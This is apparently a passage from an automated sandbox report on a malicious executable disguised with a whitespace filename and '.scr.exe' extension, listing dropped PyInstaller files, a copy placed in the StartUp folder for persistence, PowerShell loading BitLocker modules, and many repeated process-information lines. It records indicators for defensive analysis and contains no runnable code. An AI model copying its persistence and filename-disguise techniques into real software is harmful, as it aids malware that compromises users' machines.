              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scrJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: initial sampleStatic PE information: #U202f#U202f#U2005#U00a0.scr.exe
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE151E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF73AE151E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
